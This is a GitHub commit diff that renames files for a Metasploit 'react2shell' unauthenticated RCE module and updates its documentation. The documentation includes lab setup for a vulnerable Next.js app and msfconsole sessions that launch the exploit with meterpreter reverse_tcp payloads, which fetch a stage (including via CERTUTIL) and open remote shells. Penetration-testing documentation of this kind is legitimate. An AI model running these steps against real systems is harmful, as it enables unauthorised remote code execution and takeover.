Skip to content

Commit 1dde12b

Browse files
committed
fix naming errors
1 parent 38682b5 commit 1dde12b

File tree

11 files changed

+20
-20
lines changed

11 files changed

+20
-20
lines changed

data/exploits/react2shell_unath_rce_cve_2025_55102/Dockerfile renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/Dockerfile

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/index.html renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/index.html

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/next.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/next.config.js

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/package.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/package.json

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/actions.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/actions.tsx

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/layout.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/layout.tsx

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/src/app/page.tsx renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/src/app/page.tsx

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/tsconfig.json renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/tsconfig.json

File renamed without changes.

data/exploits/react2shell_unath_rce_cve_2025_55102/vite.config.js renamed to data/exploits/react2shell_unauth_rce_cve_2025_55102/vite.config.js

File renamed without changes.

documentation/modules/exploit/multi/http/react2shell_unath_rce_cve_2025_55102.md renamed to documentation/modules/exploit/multi/http/react2shell_unauth_rce_cve_2025_55102.md

Lines changed: 20 additions & 20 deletions
Original file line numberDiff line numberDiff line change
@@ -9,7 +9,7 @@ requests with "__proto__", "constructor", or "prototype" as module names.
99

1010
### Linux
1111

12-
1. Open `data\exploits\react2shell_cve_2025_55182` directory
12+
1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
1313
2. Build
1414
```
1515
docker build -t react2shell .
@@ -22,7 +22,7 @@ docker run -p 3000:3000 react2shell
2222

2323
### Windows
2424

25-
1. Open `data\exploits\react2shell_cve_2025_55182` directory
25+
1. Open `data\exploits\react2shell_unauth_rce_cve_2025_55102` directory
2626
2. Build the application
2727
```
2828
npm run build
@@ -38,17 +38,17 @@ npm start
3838
### Linux
3939

4040
```
41-
msf6 > use multi/http/react2shell_cve_2025_55182
42-
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
43-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 172.17.0.1
41+
msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102
42+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
43+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 172.17.0.1
4444
RHOSTS => 172.17.0.1
45-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
45+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
4646
RPORT => 3000
47-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
47+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
4848
LPORT => 6666
49-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8081
49+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8081
5050
FETCH_SRVPORT => 8081
51-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
51+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
5252
[*] Started reverse TCP handler on 172.17.0.1:6666
5353
[*] Running automatic check ("set AutoCheck false" to disable)
5454
[+] The target appears to be vulnerable.
@@ -67,23 +67,23 @@ Meterpreter : x64/linux
6767
### Windows
6868

6969
```
70-
msf6 > use multi/http/react2shell_cve_2025_55182_scanner
71-
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
72-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RHOSTS 192.168.19.137
70+
msf6 > use multi/http/react2shell_unauth_rce_cve_2025_55102_scanner
71+
[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
72+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RHOSTS 192.168.19.137
7373
RHOSTS => 192.168.19.137
74-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set RPORT 3000
74+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set RPORT 3000
7575
RPORT => 3000
76-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set LPORT 6666
76+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set LPORT 6666
7777
LPORT => 6666
78-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_SRVPORT 8082
79-
FETCH_SRVPORT => 8082
80-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set target 1
78+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set target 1
8179
target => 1
82-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
80+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
8381
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
84-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > set FETCH_COMMAND CERTUTIL
82+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_SRVPORT 8082
83+
FETCH_SRVPORT => 8082
84+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > set FETCH_COMMAND CERTUTIL
8585
FETCH_COMMAND => CERTUTIL
86-
msf6 exploit(multi/http/react2shell_cve_2025_55182) > run
86+
msf6 exploit(multi/http/react2shell_unauth_rce_cve_2025_55102) > run
8787
8888
[*] Started reverse TCP handler on 192.168.19.130:4444
8989
[*] Running automatic check ("set AutoCheck false" to disable)

0 commit comments

Comments
 (0)